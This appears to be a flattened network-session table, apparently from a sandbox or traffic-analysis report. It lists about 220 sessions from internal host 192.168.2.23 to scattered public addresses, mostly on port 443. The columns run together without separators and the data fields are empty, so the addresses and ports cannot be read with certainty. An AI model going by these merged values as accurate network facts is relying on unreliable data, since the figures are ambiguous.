                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24381192.168.2.236019050.187.230.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24382192.168.2.2344820161.54.98.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24383192.168.2.235521867.82.161.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24384192.168.2.2337822174.219.71.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24385192.168.2.2360796167.232.201.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24386192.168.2.234730046.178.21.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24387192.168.2.234266643.161.1.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24388192.168.2.233866472.232.180.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24389192.168.2.2352092188.18.140.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24390192.168.2.2354038221.98.73.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24391192.168.2.23429564.146.31.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24392192.168.2.2340652115.63.203.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24393192.168.2.2360492160.29.240.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24394192.168.2.2354872198.63.108.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24395192.168.2.235163687.112.245.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24396192.168.2.233327634.129.64.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24397192.168.2.2354402179.251.165.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24398192.168.2.2342034122.215.161.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24399192.168.2.2344638183.28.115.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24400192.168.2.233482491.172.28.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24401192.168.2.235730434.45.212.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24402192.168.2.2336226144.87.63.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24403192.168.2.2358126101.45.26.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24404192.168.2.23334661.130.128.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24405192.168.2.2360870216.246.153.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24406192.168.2.235034413.146.36.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24407192.168.2.235286497.212.22.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24408192.168.2.234371665.53.134.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24409192.168.2.234049852.105.42.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24410192.168.2.234633072.143.227.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24411192.168.2.2336308203.245.166.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24412192.168.2.235227674.105.89.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24413192.168.2.234210019.246.80.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24414192.168.2.2355706148.252.128.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24415192.168.2.2345938129.51.95.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24416192.168.2.233645413.102.65.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24417192.168.2.233451665.137.86.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24418192.168.2.234754086.205.91.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24419192.168.2.233511287.130.217.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24420192.168.2.2358222207.6.122.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24421192.168.2.235105682.69.166.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24422192.168.2.233466423.106.37.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24423192.168.2.2336704126.126.112.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24424192.168.2.235827868.189.208.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24425192.168.2.233586875.102.99.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24426192.168.2.234828288.73.97.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24427192.168.2.235502842.202.174.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24428192.168.2.235337448.163.175.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24429192.168.2.2359280148.12.52.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24430192.168.2.235017274.185.234.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24431192.168.2.2353726171.55.105.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24432192.168.2.23451662.47.71.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24433192.168.2.2333528156.61.238.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24434192.168.2.2358382118.219.218.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24435192.168.2.234061619.107.134.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24436192.168.2.2352170192.18.14.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24437192.168.2.2353044175.178.63.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24438192.168.2.235804878.183.92.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24439192.168.2.2358966125.255.148.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24440192.168.2.234958881.219.252.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24441192.168.2.2347072191.95.2.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24442192.168.2.2335348161.227.101.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24443192.168.2.2333178210.1.159.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24444192.168.2.235114835.9.72.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24445192.168.2.2348818133.145.177.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24446192.168.2.235608450.173.226.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24447192.168.2.2335008189.160.7.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24448192.168.2.2340912124.30.202.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24449192.168.2.2341092187.118.130.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24450192.168.2.23567708.248.9.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24451192.168.2.2333198191.124.27.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24452192.168.2.2345406205.122.250.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24453192.168.2.235315673.46.200.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24454192.168.2.2341052167.109.161.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24455192.168.2.2360222118.33.220.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24456192.168.2.2340276186.194.78.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24457192.168.2.2347904213.35.248.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24458192.168.2.235440875.247.11.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24459192.168.2.2342538149.190.29.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24460192.168.2.23583182.48.48.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24461192.168.2.2345976188.54.166.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24462192.168.2.2357600118.12.38.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24463192.168.2.233743231.209.226.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24464192.168.2.2343034120.211.170.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24465192.168.2.2355442143.107.26.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24466192.168.2.2337568195.238.60.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24467192.168.2.234537863.198.134.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24468192.168.2.2348062180.70.206.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24469192.168.2.2357662184.202.29.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24470192.168.2.235874686.148.41.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24471192.168.2.235672851.243.40.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24472192.168.2.2352712149.123.111.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24473192.168.2.235441659.134.53.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24474192.168.2.233344861.249.180.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24475192.168.2.235763697.21.216.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24476192.168.2.2339362201.150.120.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24477192.168.2.2336196175.178.184.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24478192.168.2.2339734209.230.65.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24479192.168.2.2344480104.74.142.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24480192.168.2.2358840157.210.5.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24481192.168.2.2355678200.39.243.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24482192.168.2.233679672.19.89.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24483192.168.2.2336788121.34.73.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24484192.168.2.2345028193.216.32.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24485192.168.2.233311078.96.218.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24486192.168.2.234609893.124.43.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24487192.168.2.2342668185.217.0.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24488192.168.2.2360000135.80.84.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24489192.168.2.2348116178.61.250.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24490192.168.2.233800424.125.105.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24491192.168.2.2346860176.196.212.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24492192.168.2.2335172120.126.88.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24493192.168.2.2333700110.52.13.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24494192.168.2.23507081.2.105.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24495192.168.2.235787843.20.17.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24496192.168.2.235988861.251.224.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24497192.168.2.2350962209.85.98.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24498192.168.2.2351370223.175.55.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24499192.168.2.2340198113.159.223.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24500192.168.2.235109053.193.99.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24501192.168.2.2336800183.51.196.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24502192.168.2.2339272174.147.134.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24503192.168.2.233968048.232.223.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24504192.168.2.233815238.116.187.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24505192.168.2.233796068.218.251.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24506192.168.2.2337406135.225.26.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24507192.168.2.2358764168.167.157.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24508192.168.2.2341286164.252.226.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24509192.168.2.2357198203.180.206.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24510192.168.2.233733863.196.56.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24511192.168.2.233723042.224.193.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24512192.168.2.2336370112.51.144.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24513192.168.2.2346564155.179.195.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24514192.168.2.2339760108.204.151.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24515192.168.2.2350244111.136.34.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24516192.168.2.2339834165.161.80.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24517192.168.2.235923448.47.63.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24518192.168.2.234857087.206.198.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24519192.168.2.2349972203.12.79.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24520192.168.2.235627617.22.149.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24521192.168.2.234947896.75.249.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24522192.168.2.236041677.34.206.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24523192.168.2.233748872.41.6.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24524192.168.2.2346064136.201.105.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24525192.168.2.233852659.219.187.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24526192.168.2.2335354209.247.71.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24527192.168.2.235958036.63.135.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24528192.168.2.2352366217.20.157.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24529192.168.2.2359188103.91.129.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24530192.168.2.2345258207.47.105.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24531192.168.2.233739438.155.189.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24532192.168.2.234269042.247.47.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24533192.168.2.2343374162.227.232.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24534192.168.2.233868624.255.234.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24535192.168.2.234589465.248.144.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24536192.168.2.2337526163.241.230.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24537192.168.2.23598684.18.167.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24538192.168.2.2353232144.97.150.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24539192.168.2.2335790173.126.109.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24540192.168.2.2335204187.62.158.1368080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24541192.168.2.233743095.225.214.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24542192.168.2.2346178210.186.103.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24543192.168.2.235701471.235.250.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24544192.168.2.2349084216.31.100.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24545192.168.2.2347158168.35.190.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24546192.168.2.2336446151.96.73.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24547192.168.2.23518808.228.7.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24548192.168.2.233375069.160.218.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24549192.168.2.2349358111.236.130.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24550192.168.2.235465217.147.53.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24551192.168.2.233277223.2.254.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24552192.168.2.233978819.192.88.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24553192.168.2.2337906209.172.155.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24554192.168.2.2345818125.105.73.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24555192.168.2.2335592101.22.16.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24556192.168.2.233932645.195.94.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24557192.168.2.233613099.71.49.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24558192.168.2.2357606169.0.141.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24559192.168.2.2346012197.71.38.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24560192.168.2.233345469.38.218.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24561192.168.2.2355984144.47.207.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24562192.168.2.234361469.53.36.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24563192.168.2.235119632.133.207.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24564192.168.2.2341796166.136.82.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24565192.168.2.2336942220.54.199.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24566192.168.2.2338916194.123.153.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24567192.168.2.233281076.71.165.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24568192.168.2.2348488100.40.27.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24569192.168.2.235554218.216.112.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24570192.168.2.235488059.35.127.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24571192.168.2.2360102117.71.232.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24572192.168.2.2356940220.209.125.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24573192.168.2.2335408108.161.82.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24574192.168.2.234354099.83.192.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24575192.168.2.2333710184.30.245.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24576192.168.2.234859469.86.141.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24577192.168.2.2333392123.252.219.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24578192.168.2.234806879.169.51.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24579192.168.2.234063261.233.238.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24580192.168.2.234835017.192.186.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24581192.168.2.2354374114.82.43.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24582192.168.2.2346996173.255.169.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24583192.168.2.2357510181.94.168.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24584192.168.2.2333784223.22.49.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24585192.168.2.2341906175.180.4.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24586192.168.2.2350318188.68.141.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24587192.168.2.2335580206.84.24.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24588192.168.2.235721038.20.48.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24589192.168.2.2336028144.209.139.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24590192.168.2.235607077.37.205.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24591192.168.2.235946253.236.249.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24592192.168.2.235444888.83.103.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24593192.168.2.2353884212.184.187.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24594192.168.2.2333520216.190.19.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24595192.168.2.2348476201.188.136.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24596192.168.2.2353990105.187.76.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24597192.168.2.233925052.18.225.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24598192.168.2.235198250.19.193.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24599192.168.2.2332938138.28.237.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24600192.168.2.2344998132.204.174.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24601192.168.2.235845634.202.81.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24602192.168.2.234566239.80.142.177443
